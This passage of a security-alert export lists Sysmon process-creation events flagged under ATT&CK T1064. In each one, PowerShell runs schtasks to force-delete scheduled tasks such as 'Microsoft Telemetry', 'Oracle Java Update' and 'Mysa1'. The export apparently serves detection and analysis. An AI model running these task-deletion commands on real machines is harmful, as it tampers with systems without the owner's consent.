/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.778006900Z"",""eventRecordID"":""2478"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.775\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010db6e1e00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.775"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010db6e1e00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.868",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.743 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010046d1e00} +ProcessId: 5308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.746413500Z"",""eventRecordID"":""2477"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.743\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010046d1e00}\r\nProcessId: 5308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.743"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010046d1e00}"",""processId"":""5308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.854",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.711 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010246b1e00} +ProcessId: 7776 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.713765200Z"",""eventRecordID"":""2476"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.711\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010246b1e00}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.711"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010246b1e00}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.838",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.677 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-00100a691e00} +ProcessId: 7584 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.680964100Z"",""eventRecordID"":""2475"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.677\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-00100a691e00}\r\nProcessId: 7584\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.677"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-00100a691e00}"",""processId"":""7584"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.821",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.641 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001028671e00} +ProcessId: 5384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.648464000Z"",""eventRecordID"":""2474"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.641\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001028671e00}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.641"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001028671e00}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.808",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.580 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001054651e00} +ProcessId: 6012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.605201700Z"",""eventRecordID"":""2473"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.580\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001054651e00}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.580"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001054651e00}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.795",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.548 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001016631e00} +ProcessId: 7116 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.551228800Z"",""eventRecordID"":""2472"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 